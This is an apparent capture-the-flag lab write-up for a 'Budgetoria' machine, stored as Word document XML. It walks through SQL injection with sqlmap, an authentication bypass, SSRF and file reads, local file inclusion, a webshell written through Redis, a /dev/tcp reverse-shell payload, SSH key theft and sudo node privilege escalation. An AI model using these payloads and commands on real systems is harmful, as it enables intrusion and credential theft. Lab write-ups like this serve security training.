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md5x29xlq8di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6gjyyfwyiu02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BUDGETORIA machine.If you require support, please open a ticket in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36"/>
          <w:szCs w:val="36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6"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan: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need to determine which services are running in the background and which ports are open. Therefore, we will use a tool called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58900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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 22 - SSH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 80 - HTTP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 6379 - REDIS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port 80 of the web service, a redirection occurs to the domain </w:t>
      </w:r>
      <w:hyperlink r:id="rId9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budgetoria.hc</w:t>
        </w:r>
      </w:hyperlink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971800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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resolve this, it is necessary to map the IP address to the domain name by adding an entry to the hosts file, as demonstrated in the image below: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16100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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br w:type="textWrapping"/>
        <w:t xml:space="preserve">When accessing the application and navigating to the endpoint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/forgot-password,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the system requests an email address to initiate the password recovery process. However, in the absence of a valid email, it is possible to intercept the request and perform attacks such as SQL Injection.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5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inserting a single quote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( ' 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email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parameter, the application returns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500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status code response along with a JSON object containing an error message indicating a SQL syntax issue. This behavior clearly demonstrates that the system is vulnerable to SQL Injection attacks.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25600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Based on the identification of the SQL Injection vulnerability, we can use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sqlmap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automate the exploitation process.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Burp Suite,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we right-click the intercepted request, select the option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“Copy to file,”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save the request as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sql.req.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file will be used as input for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allowing the tool to read and automatically execute the necessary operations to exploit the vulnerability.</w:t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66900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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sqlmap -r sql.req --dbs</w:t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51200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Now we will list the tables in the budgetoria database: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sqlmap -r sql.req -D budgetoria --tables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57300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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identifying the presence of a single table named users, we proceed to dump its data using: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sqlmap -r sql.req -D budgetoria -T users --dump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44600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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dumping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table, we identified two relevant records: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Charles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Role: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Admin</w:t>
        <w:br w:type="textWrapping"/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Password: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$2b$12$iuqzSLeg8DqcaIDIQeYl5uLkkrxmdb6NPCZoTTZZ9WMQIndighDYC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can attempt to crack these hashes to recover the passwords using tools such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hashcat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John the Ripper.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a few minutes, we successfully cracked the hash of user George.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User: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George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Role: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Staff</w:t>
        <w:br w:type="textWrapping"/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Password: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$2b$12$8j2.CrN1RYMV4dR/HKH9x.9XxH16VrmJDjASeEaSBdaNj1WP51kAa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90600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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can return to the application and log in using George’s credentials.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57400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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logging into the application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George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noticing that no interactive features were available, we analyzed the page source code. During this analysis, we identified a commented JavaScript snippet suggesting the possibility of changing the user’s role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55800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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this is an authenticated route, we must first obtain our JWT token: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81200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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can send the request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Burp Suite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change our role by providing the user ID. This ID can be obtained from the previously dumped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table.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89100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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updating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role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log out and log back into the application to ensure the role changes are applied. After accessing the application again, we identified a link pointing to the subdomain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backoffice-internalxyui.budgetoria.hc.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We must repeat the previous step and add this subdomain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hosts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file.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25600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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the subdomain, we observed that the application is vulnerable to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user enumeration.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occurs because the response varies depending on the username entered.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If the username “john” is entered, the message returned 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“Invalid username.”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br w:type="textWrapping"/>
        <w:t xml:space="preserve">If the username “admin” is entered, the message returned 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“Invalid credentials.”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difference allows an attacker to determine whether a username exists, which can be exploited for brute-force attacks or targeted login attempts.</w:t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00400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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76600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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unsuccessful brute-force and SQL injection attempts, we were able to exploit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type juggling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vulnerability to bypass authentication and gain access to the application.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Type juggling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occurs when the application improperly handles data type conversions, allowing values to be interpreted unexpectedly. This can be leveraged to manipulate authentication logic.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intercept the request using Burp Suite and insert the value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"true"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into the password parameter.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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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Reference:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId2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https://secops.group/php-type-juggling-simplified/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68700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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81200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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gaining access, we navigate to the endpoint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/media,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where it is possible to provide a URL for media file upload. We intercept this request using Burp Suite.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66900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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intercepting the request and inserting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file:///etc/passwd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payload, we observed that the application is not only vulnerable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SSRF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but also to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file read.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vulnerability can be confirmed by accessing the generated content at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/uploads/random-string.mp4.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511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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765300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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the application is developed in PHP and we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have file read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capabilities, we can read the source code to identify additional vulnerabilities.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path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/proc/self/cwd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a symbolic link in Linux that points to the current working directory of the running process.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473200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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89100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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analyzing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index.php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file, we observed that it imports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Router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class. We then proceed to read this file. Additionally, we identified the presence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bootstrap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file located in the application’s root directory, which we will analyze next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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00200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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73300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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While analyzing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Router.php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observed a route for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/page_preview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that is not accessible from the frontend. Therefore, we analyze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PagePreviewController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located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app/controllers.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676400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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PagePreviewController.php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observe that the controller expects a parameter p, which is used to load a view from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/views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directory. We identified that the code is vulnerable to file inclusion, allowing arbitrary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file inclusion.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exploit this vulnerability and achieve Remote Code Execution (RCE), we need to find a way to create a malicious file on the server and include it. We then proceed to read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bootstrap.php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as previously mentioned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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16100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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38300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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While analyzing bootstrap.php, we found the Redis credentials. As observed earlier in the Nmap scan, the Redis port (6379) is open.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credentials in hand, we access Redis and attempt to write a webshell to the server.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82700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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writing the webshell to the /dev/shm directory, where all users have write permissions, we access the route: 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/page_preview?p=../../../../../../../../dev/shm/wshell.php&amp;0=&lt;command&gt;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execute remote commands.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11200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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next step is to obtain a reverse shell. Reverse shell payload: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/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;vpn-ip&gt;/4444 0&gt;&amp;1"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Netcat listener to receive the connection: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31900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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Note: The reverse shell payload must be URL-encoded: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br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId43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https://urlencode.org/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62000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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sending the reverse shell payload, we obtain the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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39800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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Shell TTY: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script /dev/null -c bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ctrl+Z</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">stty raw -echo;fg</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">export TERM=xterm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Accessing the root directory /, we obtain the first flag.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28700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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/opt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directory, we find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file.crypt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is encrypted. Inside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misc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directory, we find the script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encrypt.py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that was used to encrypt this file.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33500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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Upon analyzing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encrypt.py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script, we observe that it contains both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encrypt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decrypt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functions. Therefore, we must invoke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decrypt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function to decrypt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file.crypt.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165600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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only required modification is to call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decrypt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instead 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encrypt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inside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print()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function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr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def encrypt_file(file_path, password, salt):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr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    if(not os.path.exists(file_path)):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr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              sys.exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr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file_content = open(file_path, 'r').read()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038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print(decrypt(password, salt, file_content));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we do not have permission to edit the original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script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copy it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/tmp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 where we can modify it.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66800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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60600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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making the modification, we execute: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python3 encrypt.py /opt/file.crypt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76300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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running the script, we obtain the password of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john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We then use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 john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provide the recovered password.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63600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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Running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 -l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observe that it is possible to execute the binary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/opt/utilities/filesystem_controll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privileges of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svc_user.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308100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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executing the binary, it requests a password.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76300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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strings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command on the binary, we identify the stored password.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02000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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password obtained, we execute the binary again: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sudo -u svc_user /opt/utilities/filesystem_controll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Enter password: xZwf9jM1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Choose: 1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">File path: /home/svc_user/.ssh/id_rsa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32000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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obtaining the id_rsa private key of user svc_user, we use SSH to access the account.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40000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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gaining access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svc_user,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we run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 -l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again and identify that we have permission to execute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(ALL : ALL) NOPASSWD: /usr/bin/node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root privileges. To escalate privileges and obtain the final flag, we can use the following reference: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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5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https://gtfobins.github.io/gtfobins/node/#sudo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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1092200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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06500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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this, we achieve root access and retrieve the final flag.</w:t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headerReference r:id="rId61" w:type="default"/>
      <w:headerReference r:id="rId62" w:type="first"/>
      <w:headerReference r:id="rId63" w:type="even"/>
      <w:footerReference r:id="rId64" w:type="default"/>
      <w:footerReference r:id="rId65" w:type="first"/>
      <w:footerReference r:id="rId66" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve"> 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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="2"/>
    <w:bookmarkEnd w:id="2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83" name="image40.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image40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A">
    <w:pPr>
      <w:jc w:val="center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2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4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4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</w:t>
                          </w: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Budgetoria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40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09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2.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlencode.org/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId45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budgetoria.hc" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId49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38.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secops.group/php-type-juggling-simplified/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/node/#sudo" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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IBMPlexSansSemiBold-regular.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlex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0.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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02/qk6zQVQe3lFs36xl5vwj+6g==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC4xNzVmNWNzOTR6MG84AHIhMU1NNl9NaVBHTUpMSmZUMGdXdFVtckI3cDRXRVozOV9y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